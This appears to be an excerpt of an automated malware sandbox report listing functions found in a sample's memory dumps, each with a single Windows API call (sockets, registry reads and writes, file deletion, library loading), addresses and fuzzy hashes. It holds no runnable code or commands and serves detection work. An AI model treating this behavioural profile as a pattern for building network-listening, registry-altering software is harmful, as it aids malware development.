Opcode Fuzzy Hash: a8315b7fd53c1e3561fb54cdb02868ba06280c67e827fc6a472557f85f2aa957
Instruction Fuzzy Hash: B62184B14093846FDB22CF65DC45F66BFB8EF45320F0884ABE9859F152C374A504CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00CBAC5E, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E2C,F9700A6C,00000000,00000000,00000000,00000000), ref: 00CBACD8

Memory Dump Source

Source File: 00000004.00000002.920828594.0000000000CBA000.00000040.00000001.sdmp, Offset: 00CBA000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 4acd879b4277fbefabfe2ea18369d766fc8d7ecc042042150f7d50796546ce55
Instruction ID: bf31b057b01e5362b68e814ac66cf27c8aa14d8687183c7da2b867c5313843b4
Opcode Fuzzy Hash: 4acd879b4277fbefabfe2ea18369d766fc8d7ecc042042150f7d50796546ce55
Instruction Fuzzy Hash: B8219075600704AFE721CF26CC84FA6FBECEF04720F14846AE9859B656D765E908CA72

Uniqueness

Uniqueness Score: -1.00%

Function 00CBB002, Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

GetTokenInformation.KERNELBASE(?,00000E2C,F9700A6C,00000000,00000000,00000000,00000000), ref: 00CBB06C

Memory Dump Source

Source File: 00000004.00000002.920828594.0000000000CBA000.00000040.00000001.sdmp, Offset: 00CBA000, based on PE: false

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: bedff35744c8226c1c92a9a0a165a3c4a4b2facbd24892c1bd70d9a624d18536
Instruction ID: bebe0eb9353d60b0f5221326dfcd7160a892ef1483fe18134bd05b09666602ca
Opcode Fuzzy Hash: bedff35744c8226c1c92a9a0a165a3c4a4b2facbd24892c1bd70d9a624d18536
Instruction Fuzzy Hash: 1C118CB1500304AFEB21DF65DC85BABBBA8EF04320F14846AE9459A256D674E908CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 04CE5714, Relevance: 1.6, APIs: 1, Instructions: 69fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?), ref: 04CE5788

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 6bee2542dcf32d1a32b7eceb1c1ee5bd888fd0ef1f7a3be0a9408934a920c508
Instruction ID: 4e124182dbd6be5a72ae3da9131230edd1c3dda35f6fa97e9938e251107dc1bb
Opcode Fuzzy Hash: 6bee2542dcf32d1a32b7eceb1c1ee5bd888fd0ef1f7a3be0a9408934a920c508
Instruction Fuzzy Hash: 1F219F725093C09FEB128F66DC51792BFE4AF07224F0D84EAD884CF263D224A948CB61

Uniqueness

Uniqueness Score: -1.00%

Function 04CE4ECD, Relevance: 1.6, APIs: 1, Instructions: 68windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,?,?,?,?), ref: 04CE4F44

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: MessagePeek
String ID:
API String ID: 2222842502-0
Opcode ID: a1ad21780077b8eb2387524b7d8bf2eac605d207d8d2f09823f8039f98925198
Instruction ID: 4110a3e7f5969b14ea5eeacfe050f6fe0f5759a3e22d2deb4acf4d41853999e2
Opcode Fuzzy Hash: a1ad21780077b8eb2387524b7d8bf2eac605d207d8d2f09823f8039f98925198
Instruction Fuzzy Hash: BE21CF764093809FDB228F25DC40A62FFB4EF06324F0884CEED858F163D365A908DB61

Uniqueness

Uniqueness Score: -1.00%

Function 04CE1142, Relevance: 1.6, APIs: 1, Instructions: 68networkCOMMON

Download Yara Rule

APIs

accept.WS2_32(?,?), ref: 04CE11AD

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: accept
String ID:
API String ID: 3005279540-0
Opcode ID: 58cd3fd21f987dc309dd38bce65967ff6f244b521859e8493d1961b32484c817
Instruction ID: 791afb9fad42c7ae18861b8ad8115f9efcf5e55a414630325e4fb303256d7403
Opcode Fuzzy Hash: 58cd3fd21f987dc309dd38bce65967ff6f244b521859e8493d1961b32484c817
Instruction Fuzzy Hash: 4F21A1B5600344AFE721DF6ADD45B66FBE8EF08320F18846AED448B242E776F504CA71

Uniqueness

Uniqueness Score: -1.00%

Function 04CE050A, Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 04CE0575

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: ce3eec99c2dfa7567992f6669fff571ae6b4dc25edc22d269e9091cfe48e9feb
Instruction ID: 92301ad1fca890391e0585f352aa405c238632c4668039e8f8a1b5526f109805
Opcode Fuzzy Hash: ce3eec99c2dfa7567992f6669fff571ae6b4dc25edc22d269e9091cfe48e9feb
Instruction Fuzzy Hash: 87219DB1601340AFE721DF6ADC85B66FBA8EF05320F18846AED858B245E375F504CAB5

Uniqueness

Uniqueness Score: -1.00%

Function 00CBB84E, Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32(?,?,?,?,?), ref: 00CBB8BA

Memory Dump Source

Source File: 00000004.00000002.920828594.0000000000CBA000.00000040.00000001.sdmp, Offset: 00CBA000, based on PE: false

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: 8c6756ccd64b7905405e48b5b18c519e9edfabbef57c856dda1d2ca4e0f42d9b
Instruction ID: a006dcc8dc9b6e8e341440e97c4dbc2d947b1017a00f2aa5a2bf0168e0adc50a
Opcode Fuzzy Hash: 8c6756ccd64b7905405e48b5b18c519e9edfabbef57c856dda1d2ca4e0f42d9b
Instruction Fuzzy Hash: 9A21D171504300AFEB21CF65DC45BA6FBE8EF08320F14846EEE858B651D3B6A804CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00CBB913, Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,?,?,?,?), ref: 00CBB990

Memory Dump Source

Source File: 00000004.00000002.920828594.0000000000CBA000.00000040.00000001.sdmp, Offset: 00CBA000, based on PE: false

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: d2ad675be41e606667d993f2dce874721b4ea746d0c4521a462fee78d398c75e
Instruction ID: 17fe3267fc460eb15fdfc37bab3fada882214cf364c7a50dbc63fb0ce9e52056
Opcode Fuzzy Hash: d2ad675be41e606667d993f2dce874721b4ea746d0c4521a462fee78d398c75e
Instruction Fuzzy Hash: BB2189724083809FDB128F65D844A92BFB4EF06320F0984DAE9848F163C365A959CB61

Uniqueness

Uniqueness Score: -1.00%

Function 04CE060A, Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNELBASE ref: 04CE067E

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: 117037aee17d746d471661b5024fd388bda2574de06044ddc15784542a38bc64
Instruction ID: d6d23513944cb6e754db7997ced72dbcb00bd981f7ca3505928e2b4417765f5d
Opcode Fuzzy Hash: 117037aee17d746d471661b5024fd388bda2574de06044ddc15784542a38bc64
Instruction Fuzzy Hash: BF21CD71500300AFE721CF5ACD84F6AFBE8EF08320F04845AE9849B651D3B5F508CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 04CE3DD2, Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON

Download Yara Rule

APIs

WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 04CE3E4E

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: Connect
String ID:
API String ID: 3144859779-0
Opcode ID: 5757188024e85b929782b05ca445c8de793526fe27e0c1eb8bcfd8a02676c5ba
Instruction ID: 20f986fbe80f4da2196f40d45d57ce6db14dfb02038a5fede6bf875dbdcc513a
Opcode Fuzzy Hash: 5757188024e85b929782b05ca445c8de793526fe27e0c1eb8bcfd8a02676c5ba
Instruction Fuzzy Hash: 36215E75409384AFDB228F55DC44B62BFF4EF06210F08859AED858B262D375A918DB61

Uniqueness

Uniqueness Score: -1.00%

Function 04CE2D4A, Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON

Download Yara Rule

APIs

GetNetworkParams.IPHLPAPI(?,00000E2C,F9700A6C,00000000,00000000,00000000,00000000), ref: 04CE2DC8

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: NetworkParams
String ID:
API String ID: 2134775280-0
Opcode ID: 9e2778146e5cea016d5c8a74f622486b7ed9e43e027fe7902166fc1baaf22281
Instruction ID: ab3747cfc7a0252a2762b4a209c64e52ba6bb600e874d7cac17fc57d5b3237e3
Opcode Fuzzy Hash: 9e2778146e5cea016d5c8a74f622486b7ed9e43e027fe7902166fc1baaf22281
Instruction Fuzzy Hash: F32190714093846FEB22CB158C45BA6FFB8EF46320F0884DAE9849B193C264A508CB62

Uniqueness

Uniqueness Score: -1.00%

Function 04CE35D2, Relevance: 1.6, APIs: 1, Instructions: 66registryCOMMON

Download Yara Rule

APIs

RegOpenCurrentUser.KERNELBASE(?,00000E2C), ref: 04CE3635

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: CurrentOpenUser
String ID:
API String ID: 1571386571-0
Opcode ID: dbd9ef78c66d2b36388d1b2437cb6dd024ff92cc2aefd9bbfa18c7394de8f429
Instruction ID: e0da7a3198d2d41f6bb396d1ed37f0b9e08dd6ee4ad5b5d88284fba8376827a3
Opcode Fuzzy Hash: dbd9ef78c66d2b36388d1b2437cb6dd024ff92cc2aefd9bbfa18c7394de8f429
Instruction Fuzzy Hash: 2411D371500344AFEB219F6ADC45F7AFBACEF04320F14886AED449B255D374B5058A71

Uniqueness

Uniqueness Score: -1.00%

Function 04CE026E, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E2C,F9700A6C,00000000,00000000,00000000,00000000), ref: 04CE02E0

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 6facfd3d85b815d130181955d2424676f40fb32ce7a91d3cbfeff77d6f3d67b1
Instruction ID: 25035557e63504d5c25755f7fbdaa3396b66eab6e77eca13145f279745e79a25
Opcode Fuzzy Hash: 6facfd3d85b815d130181955d2424676f40fb32ce7a91d3cbfeff77d6f3d67b1
Instruction Fuzzy Hash: 1D117F72600704AFEB21CE57CC85F67FBE8EF08720F18845AE9459B656D7A4F504CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 04CE1A6D, Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

LoadLibraryShim.MSCOREE(?,?,?,?), ref: 04CE1AE9

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: LibraryLoadShim
String ID:
API String ID: 1475914169-0
Opcode ID: fd2bd7e0237e2efb4b6a42e6feeba8b3e2b7ccf5301db32a76fef0adaa13cf2b
Instruction ID: aedfc10b1b029b35ac2f30e1742751be706e325a911f08407484bc28bed7efa2
Opcode Fuzzy Hash: fd2bd7e0237e2efb4b6a42e6feeba8b3e2b7ccf5301db32a76fef0adaa13cf2b
Instruction Fuzzy Hash: 302181B55093845FD7228E15DC45B62BFE8EF46614F0C809AED84CB253D375E518CB61

Uniqueness

Uniqueness Score: -1.00%

Function 04CE37D6, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegNotifyChangeKeyValue.KERNELBASE(?,00000E2C,F9700A6C,00000000,00000000,00000000,00000000), ref: 04CE3840

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: ChangeNotifyValue
String ID:
API String ID: 3933585183-0
Opcode ID: b0095aa592c1d911c01992385f5d95f14ce9084485be5c700c4da5b5a4be491f
Instruction ID: 484a6eb77a8bb6329a0c9b2056314680f18608454d42b93bedcd28798a16717b
Opcode Fuzzy Hash: b0095aa592c1d911c01992385f5d95f14ce9084485be5c700c4da5b5a4be491f
Instruction Fuzzy Hash: 65116DB1500344AEEB21CF56DC44FA6BBA8EF04320F14846AED459B255D674E505CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 04CE0C56, Relevance: 1.6, APIs: 1, Instructions: 64timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNELBASE(?,00000E2C,F9700A6C,00000000,00000000,00000000,00000000), ref: 04CE0CB5

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: 852b665eed1e0bc2b02f0710e4929816d150c740e225e07378e5f3cd0b83d937
Instruction ID: 9200222b83b26b036886e01d85855a405cf9f7f97c2b06de53e22f92503977ea
Opcode Fuzzy Hash: 852b665eed1e0bc2b02f0710e4929816d150c740e225e07378e5f3cd0b83d937
Instruction Fuzzy Hash: E61193B1600300AFEB21CF56DC45B66FBA8EF04320F18846AED459B555D774E504CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 04CE1246, Relevance: 1.6, APIs: 1, Instructions: 63networkCOMMON

Download Yara Rule

APIs

WSAEventSelect.WS2_32(?,00000E2C,F9700A6C,00000000,00000000,00000000,00000000), ref: 04CE12AA

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: EventSelect
String ID:
API String ID: 31538577-0
Opcode ID: da05c235618f6a433d7007b85d2bd9ee2b7b8b0cebc3590ec831b44084f4ecc0
Instruction ID: 5cf30812e4eacf474840ae56912d7ca28c271d98c45a055dc1bac9c2f0b045f8
Opcode Fuzzy Hash: da05c235618f6a433d7007b85d2bd9ee2b7b8b0cebc3590ec831b44084f4ecc0
Instruction Fuzzy Hash: 21118EB1500304AFEB21CF66DC84FA6BBACEF04320F18846AE945DB246D674E504CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 00CBA65A, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 00CBA6CC

Memory Dump Source

Source File: 00000004.00000002.920828594.0000000000CBA000.00000040.00000001.sdmp, Offset: 00CBA000, based on PE: false

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: c64c0bc8eedf50374d3dabc590775f526bae65d03382f4a68c79b97c4c4d7d18
Instruction ID: 26019ef53396237cb570763ca4206f5e0e817f50c64b0905e0165740f6507fb3
Opcode Fuzzy Hash: c64c0bc8eedf50374d3dabc590775f526bae65d03382f4a68c79b97c4c4d7d18
Instruction Fuzzy Hash: 7D2136A540D3C45FDB138B259C94662BFB49F17624F0D80DBEDC58F2A3D2696908CB72

Uniqueness

Uniqueness Score: -1.00%

Function 04CE0F82, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

getsockname.WS2_32(?,00000E2C,F9700A6C,00000000,00000000,00000000,00000000), ref: 04CE0FE3

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: getsockname
String ID:
API String ID: 3358416759-0
Opcode ID: 90293b2d6a32a085b2afd9ea0b8d0f24b60b2edb6dbdecee6b7de35f95a49e29
Instruction ID: 6302dac87cd723afa276eeb24dde7e296a1b5628e4c3d47723a23aff90f942c1
Opcode Fuzzy Hash: 90293b2d6a32a085b2afd9ea0b8d0f24b60b2edb6dbdecee6b7de35f95a49e29
Instruction Fuzzy Hash: 29118FB1600344AFEB21DF56DC85FA6FBA8EF04720F18C46AED459B246D774E508CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 04CE01AA, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

SetConsoleCtrlHandler.KERNELBASE(?,00000E2C,?,?), ref: 04CE0221

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: ConsoleCtrlHandler
String ID:
API String ID: 1513847179-0
Opcode ID: 45a2b2946d6895ab47af65331095345ecf062e9751b9f284072c5daf7101ba83
Instruction ID: 533f4313753892f9f59ef3d0cd291324ae9082358568f9d99a1b5d33200e4ea1
Opcode Fuzzy Hash: 45a2b2946d6895ab47af65331095345ecf062e9751b9f284072c5daf7101ba83
Instruction Fuzzy Hash: 7D11C871504344AFD3219B16DC41F36FFB8EF86720F15819AED448B652D225B915CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 00CBA5AF, Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00CBA61A

Memory Dump Source

Source File: 00000004.00000002.920828594.0000000000CBA000.00000040.00000001.sdmp, Offset: 00CBA000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: a6b523f201d44c58e7973af1de31372f3ee457a80459f6e453fdbd318cfa65fc
Instruction ID: 76689d14cb8c499838d7a4ed531823bcfb251e485b4d27f4fa3b374f9e647aa8
Opcode Fuzzy Hash: a6b523f201d44c58e7973af1de31372f3ee457a80459f6e453fdbd318cfa65fc
Instruction Fuzzy Hash: 87118471409380AFDB228F55DC44B62FFF4EF4A320F0884DAED858B562D375A918DB62

Uniqueness

Uniqueness Score: -1.00%

Function 04CE4996, Relevance: 1.6, APIs: 1, Instructions: 61registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.KERNELBASE(?,00000E2C,F9700A6C,00000000,00000000,00000000,00000000), ref: 04CE4A00

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: df2ddbf46d26d167297e0273307edc0628b6cc9c80b774f3e205a3b81f364dba
Instruction ID: 1d864ffb3d4f0d26b102e14ad0d3a12d8b1b1058ce50de8c8e25c7045aaeb7d1
Opcode Fuzzy Hash: df2ddbf46d26d167297e0273307edc0628b6cc9c80b774f3e205a3b81f364dba
Instruction Fuzzy Hash: 1A119DB2600300AFEB31CE56DC41F66FBA8EF04720F08846AEA459A656D774F508DA76

Uniqueness

Uniqueness Score: -1.00%

Function 04CE4A52, Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,?), ref: 04CE4AB3

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 943194ac43455b875707b3e534885b2eebe07e46abcea79c0e91f246f8a45b2f
Instruction ID: 8b182be2a2839bfab083346ecd4fec8dd2f05f34498e67105afd8b887275424e
Opcode Fuzzy Hash: 943194ac43455b875707b3e534885b2eebe07e46abcea79c0e91f246f8a45b2f
Instruction Fuzzy Hash: E11190715083809FDB15CF66DC85B66BFE8EF06220F0884AAED85CF262D274E944CB61

Uniqueness

Uniqueness Score: -1.00%

Function 04CE4E20, Relevance: 1.6, APIs: 1, Instructions: 60windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 04CE4E8D

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 49d9b665ea55c94672fea9ddbfd21fb2b13e830609dfed286ee5c34fb1f7be9d
Instruction ID: ebe8176a87d86ea194a2c8c00e0637df5981146c9aea0c6469484b7202a4a66a
Opcode Fuzzy Hash: 49d9b665ea55c94672fea9ddbfd21fb2b13e830609dfed286ee5c34fb1f7be9d
Instruction Fuzzy Hash: 6911AF755097C09FDB228B25DC81A52FFB4EF06224F0D84DEED858F563C265A908CB62

Uniqueness

Uniqueness Score: -1.00%

Function 04CE0032, Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,00000E2C,F9700A6C,00000000,00000000,00000000,00000000), ref: 04CE0091

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: 6b3346684334af0665e30cd572943098ffe6c6544794a42b5c2cf6c3d9751082
Instruction ID: 37ab42cb78915ccbcfde7c5d06beb02e49b7bf7d486b87ee46364fb1e4885a67
Opcode Fuzzy Hash: 6b3346684334af0665e30cd572943098ffe6c6544794a42b5c2cf6c3d9751082
Instruction Fuzzy Hash: 8811C171500300AFEB21CF56DC85F66FBA8EF04320F18886AED859B656D374E504CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 04CE1066, Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32(?,00000E2C,F9700A6C,00000000,00000000,00000000,00000000), ref: 04CE10BF

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: ioctlsocket
String ID:
API String ID: 3577187118-0
Opcode ID: f365861957ef79076cfa94b291dd1435ca1a390f8ec61a670832e2374d79b776
Instruction ID: 6143ae5213b2643d178acd0d831142fd38810d36325c5542f0cb35dbded3fce9
Opcode Fuzzy Hash: f365861957ef79076cfa94b291dd1435ca1a390f8ec61a670832e2374d79b776
Instruction Fuzzy Hash: CA11C2B1504344AFEB21CF5ADC85F66FBA8EF04320F18846AED459B246D774E504CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 04CE5039, Relevance: 1.6, APIs: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?), ref: 04CE50A4

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: e60975fd9698a666bdace41e2e5d33ba6c2c99b9f100a077e55a721d7e389981
Instruction ID: e727a73dff9cf06b9b30973d65e1cfb32d9b80f057a43dcb2bfc77732abf1d13
Opcode Fuzzy Hash: e60975fd9698a666bdace41e2e5d33ba6c2c99b9f100a077e55a721d7e389981
Instruction Fuzzy Hash: 51114C754093C0AFDB138F259C44A62BFB4EF47624F0984DEED858F263D2696948CB62

Uniqueness

Uniqueness Score: -1.00%

Function 04CE4D84, Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,F9700A6C,00000000,?,?,?,?,?,?,?,?,72203C38), ref: 04CE4DE4

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 94feb3be564d4c6cd4544a89d5b5c65dae0412959d1b6a64f5d0f29dfd40bc88
Instruction ID: 6af4392707d864b632c529e23d8c47f1023c70d38fc14a21dca26b8604e484e1
Opcode Fuzzy Hash: 94feb3be564d4c6cd4544a89d5b5c65dae0412959d1b6a64f5d0f29dfd40bc88
Instruction Fuzzy Hash: 3A11B2724093C09FD7128F25DD94A52FFB4EF07224F0880DAEDC58F263C265A918CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00CBA2D6, Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 00CBA32C

Memory Dump Source

Source File: 00000004.00000002.920828594.0000000000CBA000.00000040.00000001.sdmp, Offset: 00CBA000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 9888081803d8e6209460d88c01446c7c0df66b3e192cd65593e4a6b73ab54c3e
Instruction ID: 0e5201f5c26e8ab333825230a38e818c16d4960660a8c308f8e3ae04240491ea
Opcode Fuzzy Hash: 9888081803d8e6209460d88c01446c7c0df66b3e192cd65593e4a6b73ab54c3e
Instruction Fuzzy Hash: 3E1194715093809FDB128F25DC94756BFB4EF06220F0884EBED858F662D274A908CB62

Uniqueness

Uniqueness Score: -1.00%

Function 04CE326C, Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNELBASE(?,00000E2C,?,?), ref: 04CE32CE

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: FormatMessage
String ID:
API String ID: 1306739567-0
Opcode ID: 78c11cc44a408669da205a4b73db5958eb7d0478b47b903c3e2e252c4adfdc61
Instruction ID: e87baf73cb088364b5ad037ffed036813b65663b77558f1bbef77e47022d764a
Opcode Fuzzy Hash: 78c11cc44a408669da205a4b73db5958eb7d0478b47b903c3e2e252c4adfdc61
Instruction Fuzzy Hash: 04118EB2500604AFD720DF1ADC41F77FBA8EB89B20F14851AED489B641D231F915CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 04CE4472, Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,00000E2C), ref: 04CE44DB

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: c9f1775417464cf7fb80c7209007134c51213e71d731b507d40d569007cbe9aa
Instruction ID: b8e602bfb5d9a0780cda3e04290dffa2d0190af098601f1227a66657191e43f8
Opcode Fuzzy Hash: c9f1775417464cf7fb80c7209007134c51213e71d731b507d40d569007cbe9aa
Instruction Fuzzy Hash: 3B11C275600304AEE7209F16DC45F76FBA8DF04720F14845AED455A285D7B4B504CA75

Uniqueness

Uniqueness Score: -1.00%

Function 04CE140C, Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

CreateFileMappingW.KERNELBASE(?,00000E2C,?,?), ref: 04CE146E

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: CreateFileMapping
String ID:
API String ID: 524692379-0
Opcode ID: 1c4008d44d2731f4958505a50be0860807a9da602221a49b67230e0b34aec12f
Instruction ID: b3863729621d1d2c37b97da32415dd566e77742043117dc42fab3cf76e41b203
Opcode Fuzzy Hash: 1c4008d44d2731f4958505a50be0860807a9da602221a49b67230e0b34aec12f
Instruction Fuzzy Hash: 82118EB2500604AFD720DF1ADC41F77FBA8EB89B20F14851AED489B641D231F915CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 04CE2F26, Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetAdaptersAddresses.IPHLPAPI(?,00000E2C,F9700A6C,00000000,00000000,00000000,00000000), ref: 04CE2F85

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: AdaptersAddresses
String ID:
API String ID: 2506852604-0
Opcode ID: 250ab2397927e75e691de2f19db21d572642f1b5272dbeacd3df945fd48c0ada
Instruction ID: b6b8c1cf66d519498a2b8ea7abe87177aa2fe2f04e89f62c10e2fa9ac92ec51c
Opcode Fuzzy Hash: 250ab2397927e75e691de2f19db21d572642f1b5272dbeacd3df945fd48c0ada
Instruction Fuzzy Hash: 4C110E71100300AFEB218F56CC84F66FBA8EF04320F08849AED854B256D374F508CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 00CBA078, Relevance: 1.6, APIs: 1, Instructions: 54networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,?,?), ref: 00CBA0D5

Memory Dump Source

Source File: 00000004.00000002.920828594.0000000000CBA000.00000040.00000001.sdmp, Offset: 00CBA000, based on PE: false

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: f5ca0f85a1fb7abec8c14a06d46f90f94df62d005f80a244981f47f27b9758c5
Instruction ID: d87feccc7ec598e3fb77be04ebd2a60e4b881361108d599c0eceb8031d439ac1
Opcode Fuzzy Hash: f5ca0f85a1fb7abec8c14a06d46f90f94df62d005f80a244981f47f27b9758c5
Instruction Fuzzy Hash: F4119E75409380AFDB22CF55DC44B56FFB4EF46224F0884AFED858F662C275A918CB62

Uniqueness

Uniqueness Score: -1.00%

